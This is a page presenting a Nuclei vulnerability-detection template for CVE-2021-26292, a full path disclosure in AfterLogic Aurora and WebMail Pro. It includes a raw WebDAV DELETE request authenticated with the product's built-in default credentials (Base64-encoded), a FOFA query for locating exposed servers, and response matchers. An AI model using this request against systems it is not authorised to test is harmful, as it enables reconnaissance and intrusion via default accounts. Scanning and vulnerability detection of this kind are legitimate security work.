AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
ID: CVE-2021-26292
Severity: low
Author: johnk3r
Tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic
Description
Section titled “Description”AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.
YAML Source
Section titled “YAML Source”id: CVE-2021-26292
info: name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure author: johnk3r severity: low description: | AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path. reference: - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md - https://nvd.nist.gov/vuln/detail/CVE-2021-26292 classification: cve-id: CVE-2021-26292 metadata: verified: true max-request: 1 vendor: AfterLogic product: AfterLogic Aurora & WebMail fofa-query: - "X-Server: AfterlogicDAVServer" - "x-server: afterlogicdavserver" tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic
http: - raw: - | DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1 Host: {{Hostname}} Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
matchers-condition: and matchers: - type: word part: body words: - "caldav_public_user" - "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021" condition: and
- type: word part: header words: - "application/xml"
- type: status status: - 404# digest: 490a00463044022051f8e7c10b58ea6b1e57fa3626d525d2c884998696e524d660257a7f200b1d99022054d6faab850eb483b2c23970db001e48e7be064a434dc628951123c410607290:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-26292.yaml"